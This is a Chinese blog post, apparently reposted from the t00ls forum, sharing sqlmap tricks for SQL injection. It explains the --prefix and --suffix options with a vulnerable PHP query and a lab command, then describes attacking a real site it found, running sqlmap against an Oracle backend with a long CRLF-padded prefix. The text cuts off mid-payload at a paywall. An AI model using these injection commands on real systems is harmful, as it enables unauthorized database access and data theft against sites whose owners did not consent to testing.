本文分享了使用sqlmap进行SQL注入实战中的不为人知的技巧,包括利用--prefix和--suffix参数处理特殊环境,解决注入过程中的参数识别问题,以及批量验证漏洞存在的方法。同时,文章提醒读者注意避免遇到的坑和如何使用Burp Suite辅助修改数据包。
前言
此篇文章是我投t00ls通过的文章,在t00ls可以看到原稿!
在这里发布是给那些没有t00ls账号的小伙伴看看!
如果有不知道这个漏洞,可以先看看下面的文章
https://xz.aliyun.com/t/6531
0x00 致谢
感谢丞相表哥的无私相助,感谢丞相表哥倾言相怼。没有你怼言,就没有这篇文章。没有的无私,就没有我的今天。感谢丞相表哥一直以来的孜孜不倦的教诲,一直以来倾囊相授,一路有你,真好!
0x01 注入前知识补充
sqlmap参数:–prefix,–suffix
在有些环境中,需要在注入的payload的前面或者后面加一些字符,来保证payload的正常执行。
例如,代码中是这样调用数据库的:
$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";
这时你就需要–prefix和–suffix参数了:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"
这样执行的SQL语句变成:
$query = "SELECT * FROM users WHERE id=(’1’) <PAYLOAD> AND (’abc’=’abc’) LIMIT 0, 1";
0x02 开始注入
首先我找一个站点测试一下是否存在这个漏洞。
好,我已经成功验证漏洞是存在的!先构造参数和payload,后使用sqlmap开始注入。
(PS:C:\Users\samny\Desktop\22.txt 这个文件是存放上面数据包的,如果不是放在sqlmap安装路径下,注意使用绝对路径。)
sqlmap.py -r C:\Users\samny\Desktop\22.txt --dbms oracle -p formids --prefix ")))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0
最低0.47元/天 解锁文章
713
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
